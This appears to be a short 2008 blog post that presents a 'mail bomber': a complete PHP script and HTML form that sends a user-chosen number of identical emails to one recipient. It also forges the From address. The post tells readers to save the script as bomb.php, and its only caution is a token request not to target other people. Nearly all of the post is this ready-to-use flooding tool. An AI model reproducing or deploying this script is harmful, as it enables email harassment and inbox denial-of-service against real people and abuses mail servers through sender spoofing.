Online
 
Thursday, 20 November 2008
 
 

Email - Mail Bomber Send | Print |  E-Mail
 

What is mail bomber?

mail bomber is flooding mail send. this also fully your inbox over 10.000 mail.

so, don't give this mail bomb to other mail.

Code of mail bomber is:


<?
if (isset($_POST['sendbomb'])) {
for ($i = 1; $i <= 5000; $i++) {
$xx = "s";
$xx .= "$i";
$$xx = $_POST[$xx];

}

/* Email for blocked from this mail boomber */
$block = "you@mail.com";

/* Check if he person is using the filtered emails */
if(!preg_match("!$block!i",$s1)) {
/* If There was no errors */
/* Set The Mailto And Subject Variables */
$MailTo = "$s2";
$MailSubject = "$s3";

/* Remove funny chars from the email so i'm doesnt go to i'm */
$s4 = stripslashes($s4);
$MailBody = "$s4";

/* Send Email Bomb !! */
for ($i = 1; $i <= $s5; $i++) {
mail($MailTo, $MailSubject, $MailBody, "From: $s1<$s1>
X-Mailer: PHP/" . phpversion());
}

/* echo out that the email bomb was sent */
echo "Mail Boomber Success";

}
else {
/* if the email was blocked give this error message */
echo "Don't Boom My Email";
}
}
else {
?>


<form action="<? echo $_SERVER['REQUEST_URI']; ?>" method="POST" class="style2">
<input type="text" name="s1" size="18">
<br>
Send To:
<br />
<input type="text" name="s2" size="18">
<br>
Subject :
<br />
<input type="text" name="s3" size="18">
<br>
Amount To Send :
<br />
<input type="text" name="s5" size="18">
<br>
Enter a Message:
<br>
<textarea name="s4" cols="50" rows="5"></textarea>
<br >
<input type="submit" value="Send Bomb" name="sendbomb">
</form>
<?
}
?>

 

Save the code on bomb.php

Don't try to other mail, please try to your else mail.

 

This entry was posted on . You can follow any responses to this entry through the RSS 2.0 feed. You can leave a comment.
Users' Comments (0)

Comment an article
  Name
  E-mail
   Title
Available characters: 4000
 Notify me of follow-up comments
This image contains a scrambled text, it is using a combination of colors, font size, background, angle in order to disallow computer to automate reading. You will have to reproduce it to post on my homepage
Enter what you see:

No comment posted

Jumbo Coklat
 
Top! Top!